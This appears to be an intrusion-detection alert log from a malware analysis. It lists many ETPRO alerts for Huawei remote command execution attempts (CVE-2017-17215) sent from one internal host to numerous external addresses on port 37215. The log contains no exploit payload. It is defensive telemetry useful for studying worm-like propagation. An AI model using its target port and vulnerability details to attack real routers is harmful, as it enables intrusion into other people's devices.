                                                        06/13/24-21:33:17.309170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4862637215192.168.2.14156.209.75.208
                                                        06/13/24-21:32:19.728588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4065437215192.168.2.14156.76.222.246
                                                        06/13/24-21:32:21.801248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4917437215192.168.2.14197.39.125.141
                                                        06/13/24-21:32:13.543070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4123037215192.168.2.14156.15.107.156
                                                        06/13/24-21:32:30.098010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5543637215192.168.2.14197.97.178.54
                                                        06/13/24-21:32:11.506133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4754237215192.168.2.14197.110.241.243
                                                        06/13/24-21:32:46.510171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5302637215192.168.2.1441.97.168.168
                                                        06/13/24-21:32:25.994124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4843637215192.168.2.1441.77.91.74
                                                        06/13/24-21:32:56.755311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4292237215192.168.2.1441.49.100.73
                                                        06/13/24-21:32:30.079211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3874437215192.168.2.14156.245.247.240
                                                        06/13/24-21:31:57.091696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4978237215192.168.2.14197.174.148.185
                                                        06/13/24-21:31:59.174278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3596237215192.168.2.14156.183.60.101
                                                        06/13/24-21:32:23.940834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3831037215192.168.2.14156.244.37.232
                                                        06/13/24-21:32:36.264622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4125637215192.168.2.14156.79.243.152
                                                        06/13/24-21:33:02.910337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5304837215192.168.2.14156.36.2.26
                                                        06/13/24-21:33:04.992557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5954037215192.168.2.14197.18.179.149
                                                        06/13/24-21:32:05.369232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4549637215192.168.2.1441.114.227.113
                                                        06/13/24-21:32:13.564360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4047837215192.168.2.1441.1.224.164
                                                        06/13/24-21:32:52.669718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4982637215192.168.2.14197.158.91.141
                                                        06/13/24-21:32:42.404238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4343637215192.168.2.1441.181.66.79
                                                        06/13/24-21:32:03.294295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3312037215192.168.2.1441.249.78.118
                                                        06/13/24-21:32:52.669572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5605037215192.168.2.14156.80.241.76
                                                        06/13/24-21:32:30.095756TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3913237215192.168.2.14197.143.63.43
                                                        06/13/24-21:32:52.671022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4717237215192.168.2.14197.240.5.220
                                                        06/13/24-21:32:21.804397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5939837215192.168.2.14197.85.22.198
                                                        06/13/24-21:32:09.438166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4583837215192.168.2.1441.15.95.79
                                                        06/13/24-21:32:58.844039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3603837215192.168.2.14156.6.17.17
                                                        06/13/24-21:33:04.994121TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5698837215192.168.2.14197.117.58.143
                                                        06/13/24-21:32:23.943912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3869437215192.168.2.1441.196.234.235
                                                        06/13/24-21:32:50.613113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4443237215192.168.2.14197.14.36.142
                                                        06/13/24-21:32:40.374173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4909237215192.168.2.1441.76.184.97
                                                        06/13/24-21:32:42.421926TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4674437215192.168.2.14197.141.227.194
                                                        06/13/24-21:32:01.220677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4907637215192.168.2.14156.206.120.106
                                                        06/13/24-21:32:36.265781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4888837215192.168.2.1441.144.196.173
                                                        06/13/24-21:32:28.028631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5251037215192.168.2.1441.34.31.226
                                                        06/13/24-21:32:09.437989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4836237215192.168.2.14156.67.226.176
                                                        06/13/24-21:32:42.421877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6012237215192.168.2.14156.43.177.188
                                                        06/13/24-21:33:07.042859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3794637215192.168.2.14197.105.32.158
                                                        06/13/24-21:32:42.418370TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3291237215192.168.2.14197.248.11.137
                                                        06/13/24-21:32:58.824520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5256237215192.168.2.14197.18.30.137
                                                        06/13/24-21:33:17.306300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3296437215192.168.2.14156.94.213.14
                                                        06/13/24-21:32:25.986685TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4652837215192.168.2.14197.7.116.188
                                                        06/13/24-21:32:34.217565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4299037215192.168.2.1441.47.67.48
                                                        06/13/24-21:32:09.457558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5304837215192.168.2.1441.240.136.189
                                                        06/13/24-21:33:11.156528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4275237215192.168.2.1441.220.81.128
                                                        06/13/24-21:33:11.160748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6001437215192.168.2.1441.112.167.169
                                                        06/13/24-21:32:19.731232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4536637215192.168.2.1441.229.7.192
                                                        06/13/24-21:32:19.751968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4397437215192.168.2.14197.143.32.24
                                                        06/13/24-21:32:40.358871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5139637215192.168.2.14197.125.115.189
                                                        06/13/24-21:32:30.078267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4507837215192.168.2.1441.183.82.8
                                                        06/13/24-21:32:46.527480TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5241837215192.168.2.14156.187.16.20
                                                        06/13/24-21:32:32.152648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3431837215192.168.2.14156.105.133.156
                                                        06/13/24-21:33:02.912670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4803037215192.168.2.14197.239.121.218
                                                        06/13/24-21:32:34.216973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5245637215192.168.2.14156.120.130.129
                                                        06/13/24-21:33:09.089707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4057437215192.168.2.1441.21.36.95
                                                        06/13/24-21:31:57.091458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6033437215192.168.2.14197.115.185.232
                                                        06/13/24-21:32:48.550385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4984237215192.168.2.14197.101.214.100
                                                        06/13/24-21:32:48.553175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4071237215192.168.2.14156.49.76.228
                                                        06/13/24-21:33:04.988087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5432637215192.168.2.14197.19.62.65
                                                        06/13/24-21:32:19.730965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5431037215192.168.2.14197.102.197.139
                                                        06/13/24-21:32:58.823787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3319237215192.168.2.14197.100.134.138
                                                        06/13/24-21:32:30.073784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4308237215192.168.2.14156.218.22.161
                                                        06/13/24-21:32:44.476354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5072837215192.168.2.14156.41.186.23
                                                        06/13/24-21:32:07.419972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5481837215192.168.2.14156.18.50.19
                                                        06/13/24-21:32:32.168733TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4464637215192.168.2.14156.228.231.108
                                                        06/13/24-21:32:52.670241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4596237215192.168.2.1441.252.248.66
                                                        06/13/24-21:32:28.028699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4734037215192.168.2.14197.73.35.5
                                                        06/13/24-21:32:52.676246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5095237215192.168.2.1441.94.125.205
                                                        06/13/24-21:31:57.091900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5905837215192.168.2.1441.164.83.142
                                                        06/13/24-21:32:50.614024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5744037215192.168.2.14156.138.101.46
                                                        06/13/24-21:32:23.945451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4263437215192.168.2.14197.15.154.234
                                                        06/13/24-21:32:09.456656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5467237215192.168.2.14197.198.27.36
                                                        06/13/24-21:32:07.402456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5315637215192.168.2.14197.168.143.40
                                                        06/13/24-21:32:50.610106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3941437215192.168.2.1441.30.227.2
                                                        06/13/24-21:33:02.953985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5820437215192.168.2.1441.218.7.65
                                                        06/13/24-21:33:11.158450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5743837215192.168.2.14156.224.109.152
                                                        06/13/24-21:33:09.102596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6041637215192.168.2.14197.237.39.120
                                                        06/13/24-21:32:03.279541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3638037215192.168.2.1441.243.166.99
                                                        06/13/24-21:32:09.440540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5708637215192.168.2.14156.228.130.110
                                                        06/13/24-21:32:30.096503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5032237215192.168.2.14156.163.120.239
                                                        06/13/24-21:32:32.170031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4211037215192.168.2.1441.24.86.111
                                                        06/13/24-21:32:25.969306TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4110837215192.168.2.14156.11.132.221
                                                        06/13/24-21:32:30.125948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4798037215192.168.2.14156.152.11.111
                                                        06/13/24-21:32:34.193266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5983837215192.168.2.14197.9.198.244
                                                        06/13/24-21:32:32.166549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4127037215192.168.2.1441.189.162.214
                                                        06/13/24-21:33:05.012480TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5485237215192.168.2.14197.86.217.141
                                                        06/13/24-21:32:23.943122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6060437215192.168.2.14156.90.91.67
                                                        06/13/24-21:31:57.093007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4121437215192.168.2.14156.6.58.55
                                                        06/13/24-21:33:15.253173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3857437215192.168.2.1441.137.226.234
                                                        06/13/24-21:32:48.551045TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5114437215192.168.2.14156.253.69.235
                                                        06/13/24-21:33:05.012392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3323837215192.168.2.14156.239.37.30
                                                        06/13/24-21:33:13.214450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5252637215192.168.2.14197.197.205.93
                                                        06/13/24-21:32:38.303244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5254037215192.168.2.1441.121.95.22
                                                        06/13/24-21:32:56.788332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5219437215192.168.2.14197.100.66.79
                                                        06/13/24-21:32:15.611471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3696837215192.168.2.14156.25.76.98
                                                        06/13/24-21:33:13.213876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4559237215192.168.2.14197.242.78.103
                                                        06/13/24-21:33:15.253798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4642037215192.168.2.14197.61.181.77
                                                        06/13/24-21:31:59.194570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3356637215192.168.2.14156.10.114.158
                                                        06/13/24-21:32:46.503044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4724437215192.168.2.14156.150.45.53
                                                        06/13/24-21:32:40.375464TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5109837215192.168.2.14197.144.122.130
                                                        06/13/24-21:32:05.348262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5223037215192.168.2.1441.4.219.237
                                                        06/13/24-21:33:17.306772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5662037215192.168.2.1441.23.221.130
                                                        06/13/24-21:32:42.418982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4966237215192.168.2.14156.135.0.36
                                                        06/13/24-21:32:58.823475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3604637215192.168.2.14156.189.180.129
                                                        06/13/24-21:32:17.697683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5109037215192.168.2.1441.224.128.62
                                                        06/13/24-21:32:07.420114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5929437215192.168.2.14197.176.192.113
                                                        06/13/24-21:32:36.262194TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4200637215192.168.2.14156.82.44.17
                                                        06/13/24-21:32:36.269801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5108837215192.168.2.14156.183.141.197
                                                        06/13/24-21:32:21.803005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4597637215192.168.2.14197.100.220.118
                                                        06/13/24-21:32:01.219877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5778637215192.168.2.14197.220.42.12
                                                        06/13/24-21:32:21.783425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3461837215192.168.2.14197.22.230.74
                                                        06/13/24-21:32:36.242721TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4081037215192.168.2.14156.221.230.16
                                                        06/13/24-21:33:17.305882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4790637215192.168.2.14197.241.247.70
                                                        06/13/24-21:32:09.439065TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5061037215192.168.2.14197.131.181.240
                                                        06/13/24-21:32:52.659111TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3384437215192.168.2.1441.49.252.121
                                                        06/13/24-21:32:21.784649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5792637215192.168.2.14156.136.106.61
                                                        06/13/24-21:32:38.298581TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5208437215192.168.2.14156.0.250.234
                                                        06/13/24-21:31:57.092117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4459037215192.168.2.14197.143.96.116
                                                        06/13/24-21:31:57.131741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3621437215192.168.2.14156.219.182.146
                                                        06/13/24-21:32:23.938171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4696437215192.168.2.14197.121.180.82
                                                        06/13/24-21:32:44.480563TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4608837215192.168.2.14156.148.29.107
                                                        06/13/24-21:33:00.871519TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6076437215192.168.2.1441.195.172.41
                                                        06/13/24-21:32:19.730124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5792637215192.168.2.14197.159.204.211
                                                        06/13/24-21:32:01.220725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3817037215192.168.2.14156.7.41.9
                                                        06/13/24-21:32:17.695168TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3293237215192.168.2.14197.118.230.113
                                                        06/13/24-21:32:11.509309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5648437215192.168.2.1441.181.243.155
                                                        06/13/24-21:31:59.198226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5636237215192.168.2.14156.35.158.141
                                                        06/13/24-21:32:19.752244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3650437215192.168.2.1441.209.149.213
                                                        06/13/24-21:32:01.220283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5406437215192.168.2.14156.51.73.140
                                                        06/13/24-21:33:11.156977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3740437215192.168.2.1441.141.87.91
                                                        06/13/24-21:32:34.215806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4176237215192.168.2.1441.252.181.9
                                                        06/13/24-21:32:19.748582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3370837215192.168.2.1441.16.119.223
                                                        06/13/24-21:32:13.545074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4744037215192.168.2.14197.97.2.146
                                                        06/13/24-21:32:17.696549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4604037215192.168.2.14156.6.101.199
                                                        06/13/24-21:32:30.094538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6078237215192.168.2.1441.99.244.1
                                                        06/13/24-21:32:42.419991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5838837215192.168.2.14197.189.240.77
                                                        06/13/24-21:33:11.173513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5716837215192.168.2.14197.165.205.227
                                                        06/13/24-21:33:09.108284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4654637215192.168.2.14197.40.204.20
                                                        06/13/24-21:33:15.272541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5249237215192.168.2.14197.109.55.187
                                                        06/13/24-21:33:17.305079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3726437215192.168.2.14156.64.24.122
                                                        06/13/24-21:32:03.277763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5287037215192.168.2.1441.142.34.29
                                                        06/13/24-21:32:23.942034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3905637215192.168.2.14156.106.184.209
                                                        06/13/24-21:33:02.952368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4573037215192.168.2.1441.8.200.10
                                                        06/13/24-21:33:07.042564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5146037215192.168.2.14156.235.18.186
                                                        06/13/24-21:32:30.095599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3744637215192.168.2.14197.66.144.200
                                                        06/13/24-21:32:52.678534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5221037215192.168.2.14197.94.1.123
                                                        06/13/24-21:33:11.159563TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4381837215192.168.2.14197.219.186.21
                                                        06/13/24-21:32:36.243152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4515037215192.168.2.1441.153.60.54
                                                        06/13/24-21:32:40.377149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3896437215192.168.2.1441.135.205.205
                                                        06/13/24-21:32:15.633759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5790837215192.168.2.14156.108.52.128
                                                        06/13/24-21:32:50.612587TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4017637215192.168.2.1441.84.246.58
                                                        06/13/24-21:31:57.153585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4921837215192.168.2.14156.198.106.25
                                                        06/13/24-21:32:44.474945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3290837215192.168.2.1441.44.176.143
                                                        06/13/24-21:32:05.350370TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4547237215192.168.2.14197.241.248.226
                                                        06/13/24-21:32:32.152961TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3349637215192.168.2.14197.225.135.141
                                                        06/13/24-21:32:52.672139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5178437215192.168.2.14156.255.77.194
                                                        06/13/24-21:32:50.614753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5151437215192.168.2.14156.162.235.45
                                                        06/13/24-21:32:46.525963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5694237215192.168.2.14197.106.2.103
                                                        06/13/24-21:32:46.503849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3541837215192.168.2.1441.122.120.141
                                                        06/13/24-21:32:36.248395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3794437215192.168.2.1441.94.177.110
                                                        06/13/24-21:32:34.191432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5074437215192.168.2.1441.158.216.107
                                                        06/13/24-21:32:15.632326TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3828837215192.168.2.1441.52.154.95
                                                        06/13/24-21:32:30.098751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4899237215192.168.2.14156.125.210.101
                                                        06/13/24-21:32:19.749099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5318437215192.168.2.14156.94.75.8
                                                        06/13/24-21:32:52.656211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5138637215192.168.2.1441.51.21.176
                                                        06/13/24-21:32:32.169634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4790837215192.168.2.14197.85.21.152
                                                        06/13/24-21:32:01.240008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3520037215192.168.2.14197.64.1.53
                                                        06/13/24-21:31:57.138029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5306637215192.168.2.14156.120.94.111
                                                        06/13/24-21:33:05.013100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3552237215192.168.2.14197.55.254.80
                                                        06/13/24-21:33:15.256512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4891637215192.168.2.14197.141.96.224
                                                        06/13/24-21:33:04.986618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5206637215192.168.2.14156.107.241.64
                                                        06/13/24-21:31:59.177533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3821637215192.168.2.1441.20.0.38
                                                        06/13/24-21:32:09.441016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5669637215192.168.2.14156.31.184.185
                                                        06/13/24-21:32:21.785203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4778237215192.168.2.14197.164.235.161
                                                        06/13/24-21:33:11.176129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5000237215192.168.2.1441.32.75.223
                                                        06/13/24-21:32:01.223900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5841637215192.168.2.1441.13.134.169
                                                        06/13/24-21:32:54.709782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6020437215192.168.2.14156.235.144.34
                                                        06/13/24-21:32:05.347439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4517037215192.168.2.14197.253.39.140
                                                        06/13/24-21:32:23.940700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5411837215192.168.2.1441.100.119.59
                                                        06/13/24-21:31:57.093149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3761837215192.168.2.14197.150.96.223
                                                        06/13/24-21:31:59.200163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5436637215192.168.2.1441.91.46.56
                                                        06/13/24-21:32:03.275257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5530237215192.168.2.14156.153.254.119
                                                        06/13/24-21:32:21.786853TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3542837215192.168.2.14197.39.205.224
                                                        06/13/24-21:33:04.987596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5084037215192.168.2.1441.238.160.57
                                                        06/13/24-21:32:05.344772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4853637215192.168.2.14197.71.150.229
                                                        06/13/24-21:33:11.181844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5543237215192.168.2.14156.50.244.61
